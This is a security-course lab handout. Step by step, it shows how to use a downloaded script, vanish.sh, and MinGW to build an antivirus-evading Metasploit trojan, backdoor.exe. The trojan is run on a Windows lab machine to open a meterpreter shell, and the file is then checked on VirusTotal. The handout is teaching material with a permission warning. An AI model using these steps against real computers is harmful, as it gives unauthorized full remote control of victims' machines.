Project 7x: Bypassing Antivirus Part 2 (10 pts.)

What You Need

WARNING

This is a really dangerous attack that grants you full control over the target's computer.

Don't do it without the target's permission--that's a crime!

Purpose

In the previous project, you made a file invisible to antivirus, but that file also uses too much RAM, so it won't run on a Windows target.

This time we'll use a script that adjusts the file and recompiles it to fix that problem.

Installing the MinGW Development Environment

MinGW lets you develop Windows executables with Linux. It's used here to recompile the payload to make it smaller.

In Kali, in a Terminal window, execute these commands:

apt-get update

apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

Downloading the vanish.sh Script

In Kali, in a Terminal window, execute these commands:

wget https://samsclass.info/120/proj/vanish.sh --no-check-certificate

ll van*

(Note that the second command begins with two lowercase L characters, not the number 11.)

You should see the vanish.sh file, as shown below:

In Kali, in a Terminal window, execute these commands to change the permissions on the script, move it to the correct folder, and run it:

chmod a+x vanish.sh

mv vanish.sh /pentest/exploits/framework

cd /pentest/exploits/framework

./vanish.sh

The script launches, as shown below:

At the "Which Interface to use ?" prompt, type the name of the interface that connects to your target (probably eth0) and press Enter.

At the "What Port Number are we gonna listen to?" prompt, type 4444 and press Enter.

At the "Please Enter A Random Seed Number 1-10000, The Larger The Number The Larger The Resulting Executable :" prompt, type 1122 (or any other number) and press Enter.

At the "How many times you want to encode ? 1-20 :" prompt, type 1 and press Enter.

Wait while the script runs. Messages about "shikata_ga_nai" and other encoders scroll by, as shown below:

When the script is done, it will launch a payload handler, as shown below:

Moving the Trojan to the Target

In the Kali machine, open another Terminal window and execute this command:

mv /pentest/exploits/framework/seclabs/backdoor.exe /root/Desktop

Minimize all windows and look at the Kali desktop. You should see the backdoor.exe file, as shown below:

Drag the backdoor.exe file out of the virtual machine and drop it on the host machine's desktop.

Drag the backdoor.exe file from the host machine's desktop and drop it on the Windows target virtual machine's desktop.

If you are not using VMware, or if the drag-and-drop fails, you can move the file another way, such as via e-mail or a USB stick.

Viewing the Payload Handler

On the Kali machine, restore the Terminal window showing the payload handler so you can see the messages that will be created when you take control of the target.

Running the Trojan

On the Windows target, double-click the backdoor.exe file.

You should see a session open, and a "meterpreter>" prompt, as shown below:

Opening a Shell

On the Kali machine, at the "meterpreter>" prompt, type this command, and then press Enter:

shell

You should see a banner identifying the target as "Microsoft Windows", as shown below:

Saving the Screen Image

Make sure the "Microsoft Windows" banner is visible, as shown above.

Save a screen capture with a filename of "Proj 7xa from YOUR NAME".

Analyzing the Backdoor with VirusTotal

In Kali, click Applications, Internet, "Firefox Web Browser".

In Firefox, go to https://www.virustotal.com/

Click the "Choose File" button. Navigate to Desktop and double-click backdoor.exe.

In the VirusTotal web page, click the "Scan It!" button.

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that some of the antivirus engines detected the file: 14 out of 41 when I did it, as shown below. You may see different numbers, but some of the engines should detect it.

Saving the Screen Image

Make sure the result is visible, showing something like "Detection rate: 14/41", as shown above.

Save a screen capture with a filename of "Proj 7xb from YOUR NAME".

Turning In Your Project

Email the images to cnit.120@gmail.com with a subject of "Project 7x from YOUR NAME".

Trying Other Values

I heard from Keith Burton that this script really fooled all antiviruses except AVG, so I decided to try some more parameters.

With a different seed, port, and 8 iterations, I still got detected by 13/42 AV engines.

I even modified the script to use each encoder a different number of times, as shown below, and it was still detected by 12/42 AV scanners.

That's how things are supposed to work; the AV vendors are catching on.
Sources

Thanks to Keith Burton who showed me this attack and helped me understand it.
Last modified: 12-9-14 12:29 pm